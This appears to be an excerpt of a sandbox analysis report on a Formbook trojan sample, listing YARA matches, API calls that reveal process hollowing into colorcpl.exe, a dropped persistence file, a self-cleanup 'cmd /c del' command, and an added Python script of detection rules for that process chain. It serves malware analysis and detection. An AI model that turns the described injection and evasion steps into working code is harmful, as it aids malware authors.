          Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: 0321423605241625.exe PID: 3140, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: colorcpl.exe PID: 3576, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: Mwqrxeuz.exe PID: 5528, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: raserver.exe PID: 5928, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\Public\Libraries\zuexrqwM.url, type: DROPPEDMatched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
          Source: C:\Users\Public\Libraries\zuexrqwM.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
          Source: C:\Users\user\Desktop\0321423605241625.exe; Code function: 0_2_021720F4
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06EE2EF7
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E36E30
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06EDD616
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06EE1FF1
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06EEDFCE
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06ED4496
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06EDD466
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E3B477
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E2841F
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E2D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06EE25DD
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E42581
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06ED2D82
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06EE1D55
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E10D20
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06EE2D07
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06EE22AE
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06ECFA2B
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E3B236
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06EC23E3
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06ED03DA
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E4ABD8
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06EDDBD2
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E4EBB0
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E4138B
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E3AB40
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06EBCB4F
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06EE2B28
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06EE28EC
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E420A0
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06EE20A8
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E2B090
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06EEE824
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E3A830
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06ED1002
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E34120
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E1F900
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: String function: 06E1B150 appears 136 times
          Source: C:\Users\user\Desktop\0321423605241625.exe; Code function: String function: 02174C24 appears 471 times
          Source: C:\Users\user\Desktop\0321423605241625.exe; Code function: String function: 02176908 appears 32 times
          Source: C:\Users\user\Desktop\0321423605241625.exe; Code function: String function: 021748A0 appears 60 times
          Source: C:\Users\user\Desktop\0321423605241625.exe; Code function: String function: 02174A98 appears 136 times
          Source: C:\Users\user\Desktop\0321423605241625.exe; Code function: 0_2_02189128 InetIsOffline,InetIsOffline,CopyFileA,WinExec,Sleep,OpenProcess,NtSuspendThread,InetIsOffline,ZwClose,InetIsOffline,InetIsOffline,ExitProcess,
          Source: C:\Users\user\Desktop\0321423605241625.exe; Code function: 0_2_02183690 LoadLibraryA,GetModuleHandleA,GetProcAddress,RtlMoveMemory,GetCurrentProcess,NtFlushVirtualMemory,FreeLibrary,
          Source: C:\Users\user\Desktop\0321423605241625.exe; Code function: 0_2_0218779C InetIsOffline,VirtualAlloc,GetProcAddress,FreeLibrary,VirtualFree,VirtualAllocEx,GetProcAddress,FreeLibrary,WriteProcessMemory,NtProtectVirtualMemory,
          Source: C:\Users\user\Desktop\0321423605241625.exe; Code function: 0_2_0218C0D9 Sleep,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,WinExec,Sleep,OpenProcess,NtSuspendThread,InetIsOffline,ZwClose,InetIsOffline,InetIsOffline,ExitProcess,
          Source: C:\Users\user\Desktop\0321423605241625.exe; Code function: 0_2_02189128 InetIsOffline,InetIsOffline,CopyFileA,WinExec,Sleep,OpenProcess,NtSuspendThread,InetIsOffline,ZwClose,InetIsOffline,InetIsOffline,ExitProcess,
          Source: C:\Users\user\Desktop\0321423605241625.exe; Code function: 0_2_0218368E LoadLibraryA,GetModuleHandleA,GetProcAddress,RtlMoveMemory,GetCurrentProcess,NtFlushVirtualMemory,FreeLibrary,
          Source: C:\Users\user\Desktop\0321423605241625.exe; Code function: 0_2_0218773C InetIsOffline,VirtualAlloc,GetProcAddress,FreeLibrary,VirtualFree,VirtualAllocEx,GetProcAddress,FreeLibrary,WriteProcessMemory,NtProtectVirtualMemory,
          Source: C:\Users\user\Desktop\0321423605241625.exe; Code function: 0_2_02183990 InetIsOffline,CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,GetProcAddress,FreeLibrary,NtProtectVirtualMemory,SetThreadContext,NtResumeThread,
          Source: C:\Users\user\Desktop\0321423605241625.exe; Code function: 0_2_0218398E InetIsOffline,CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,GetProcAddress,FreeLibrary,NtProtectVirtualMemory,SetThreadContext,NtResumeThread,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E59660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E59FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E597A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E59780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E59710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E59540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E59A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E59A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E59A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E598F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E59860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E59840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E596D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E59670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E59650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E59610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E59760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E5A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E59770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E59730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E5A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E595F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E59560 NtWriteFile,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E59520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E5AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E59A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E59A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E5A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E59B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E598A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E5B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E59820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E599D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 1_2_06E59950 NtQueueApcThread,
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exe; Process Stats: CPU usage > 98%
          Source: C:\Users\user\Desktop\0321423605241625.exe; Section loaded: amtahoo.dll
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exe | Section loaded: amtahoo.dll (102 identical entries)
          Source: 0321423605241625.exe | ReversingLabs: Detection: 35%
          Source: 0321423605241625.exe | Virustotal: Detection: 40%
          Source: C:\Users\user\Desktop\0321423605241625.exe | File read: C:\Users\user\Desktop\0321423605241625.exe
          Source: C:\Users\user\Desktop\0321423605241625.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\0321423605241625.exe C:\Users\user\Desktop\0321423605241625.exe
          Source: C:\Users\user\Desktop\0321423605241625.exe | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Users\Public\Libraries\Mwqrxeuz.exe "C:\Users\Public\Libraries\Mwqrxeuz.exe"
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exe | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: C:\Windows\SysWOW64\raserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\colorcpl.exe"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
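The process tree above is the behavioural chain a detection engineer would want to match: a Windows system binary (colorcpl.exe) started by an executable living in a user directory, explorer.exe starting the dropped copy from C:\Users\Public\Libraries, and a SysWOW64 process (raserver.exe) running cmd.exe /c del against another system binary. The Python below is an added example, not part of the Joe Sandbox report: it runs three rules derived from that tree over process-creation events constructed here to mirror the listing, plus one benign control event. The event fields, the rule names and the list of user-writable directories are this example's own assumptions, not fields or rules of the report.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (the three fields every Sysmon event ID 1 / EDR record carries)."""
    parent: str
    image: str
    cmdline: str


# Constructed events mirroring the report's process tree (not an export of the sandbox log),
# followed by one benign control: a user opening Color Management from explorer.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Users\user\Desktop\0321423605241625.exe",
              r"C:\Users\user\Desktop\0321423605241625.exe"),
    ProcEvent(r"C:\Users\user\Desktop\0321423605241625.exe", r"C:\Windows\SysWOW64\colorcpl.exe",
              r"C:\Windows\System32\colorcpl.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Users\Public\Libraries\Mwqrxeuz.exe",
              r'"C:\Users\Public\Libraries\Mwqrxeuz.exe"'),
    ProcEvent(r"C:\Users\Public\Libraries\Mwqrxeuz.exe", r"C:\Windows\SysWOW64\colorcpl.exe",
              r"C:\Windows\System32\colorcpl.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\SysWOW64\raserver.exe",
              r"C:\Windows\SysWOW64\raserver.exe"),
    ProcEvent(r"C:\Windows\SysWOW64\raserver.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'/c del "C:\Windows\SysWOW64\colorcpl.exe"'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\colorcpl.exe",
              r"C:\Windows\System32\colorcpl.exe"),
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Assumed list of user-writable roots; extend to match the estate being monitored.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\")
PUBLIC_LIBRARIES = "c:\\users\\public\\libraries\\"
DEL_SYSTEM_BINARY = re.compile(
    r'/c\s+del\s+"?(c:\\windows\\sys(?:tem32|wow64)\\[^"\s]+\.exe)"?', re.IGNORECASE)


def is_system_binary(path: str) -> bool:
    return path.lower().startswith(SYSTEM_DIRS)


def rule_system_binary_from_user_dir(ev: ProcEvent) -> bool:
    """Hollowing candidate: a Windows system binary whose parent lives in a user-writable path.
    Fires on both colorcpl.exe launches; explorer opening colorcpl.exe for a user does not fire."""
    return is_system_binary(ev.image) and ev.parent.lower().startswith(USER_WRITABLE)


def rule_public_libraries_from_explorer(ev: ProcEvent) -> bool:
    """Autostart of the dropped binary: explorer.exe starting an executable from the
    Public Libraries folder, the drop path and Run-key target recorded in the report."""
    return (ev.parent.lower().endswith("\\explorer.exe")
            and ev.image.lower().startswith(PUBLIC_LIBRARIES))


def rule_cmd_del_of_system_binary(ev: ProcEvent) -> bool:
    """Clean-up of the injected host: a system process spawning cmd.exe /c del on a
    System32/SysWOW64 executable, as raserver.exe does to colorcpl.exe here."""
    return (ev.image.lower().endswith("\\cmd.exe")
            and is_system_binary(ev.parent)
            and DEL_SYSTEM_BINARY.search(ev.cmdline) is not None)


RULES = {
    "system_binary_from_user_dir": rule_system_binary_from_user_dir,
    "public_libraries_from_explorer": rule_public_libraries_from_explorer,
    "cmd_del_of_system_binary": rule_cmd_del_of_system_binary,
}


def evaluate(events):
    """Return (rule_name, image, parent) for every event/rule pair that fires, in event order."""
    return [(name, ev.image, ev.parent)
            for ev in events for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for name, image, parent in evaluate(SAMPLE_EVENTS):
        print(f"{name:32} {parent} -> {image}")
```

Against the constructed events the rules fire four times (the two colorcpl.exe launches, the Mwqrxeuz.exe autostart and the cmd.exe del) and stay silent on the control event. explorer.exe starting raserver.exe is deliberately not a rule of its own: explorer launches system binaries constantly, so the discriminators worth alerting on are the parent's path and the follow-on del of a system executable.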
          Source: C:\Users\user\Desktop\0321423605241625.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
          Source: C:\Users\user\Desktop\0321423605241625.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@11/5@8/1
          Source: C:\Windows\explorer.exe | File read: C:\Users\Public\Libraries\desktop.ini
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_0217823C GetDiskFreeSpaceA,
          Source: C:\Users\user\Desktop\0321423605241625.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (2 identical entries)
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (2 identical entries)
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_02185770 CreateToolhelp32Snapshot,
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1412:120:WilError_01
          Source: C:\Users\user\Desktop\0321423605241625.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 identical entries)
          Source: C:\Windows\SysWOW64\colorcpl.exe | Window found: window name: SysTabControl32
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\colorcpl.exe | Window detected: Number of UI elements: 12
          Source: Binary string: colorcpl.pdbGCTL | source: raserver.exe, 00000009.00000002.556117926.0000000005257000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000009.00000002.553458668.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: colorcpl.pdb | source: raserver.exe, 00000009.00000002.556117926.0000000005257000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000009.00000002.553458668.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP | source: colorcpl.exe, 00000001.00000003.306684881.000000000503F000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000003.308280419.00000000051D9000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.493545986.00000000049ED000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.553968858.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.499251021.0000000004B8C000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.554941231.0000000004E3F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb | source: colorcpl.exe, colorcpl.exe, 00000001.00000003.306684881.000000000503F000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000003.308280419.00000000051D9000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.493545986.00000000049ED000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.553968858.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.499251021.0000000004B8C000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.554941231.0000000004E3F000.00000040.00000800.00020000.00000000.sdmp

          Data Obfuscation

          Source: Yara match | File source: 0.2.0321423605241625.exe.3baeed8.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.0321423605241625.exe.2170000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.0321423605241625.exe.3baeed8.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000000.00000002.308860487.0000000003BAE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.308375056.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_0218F2A4 push 0218F310h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_0218F0AC push 0218F125h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_0218F144 push 0218F1ECh; ret
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_0218F1F8 push 0218F288h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_02190667 pushad ; ret
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_0217C718 push ecx; mov dword ptr [esp], edx
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_0217D78C push 0217D7B8h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_02185488 push 021854F2h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_021844AC push 021844EEh; ret
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_021884FB push 02188554h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_021884FC push 02188554h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_021835A8 push 02183653h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_021835A6 push 02183653h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_021765FC push 02176657h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_021765FA push 02176657h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_02176A48 push 02176A8Ah; ret
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_0217CB4C push 0217CFA2h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_02173894 push eax; ret
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_0217CE1C push 0217CFA2h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_0217FEA0 push 0217FF16h; ret
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_0217FFA4 push 0217FFF1h; ret
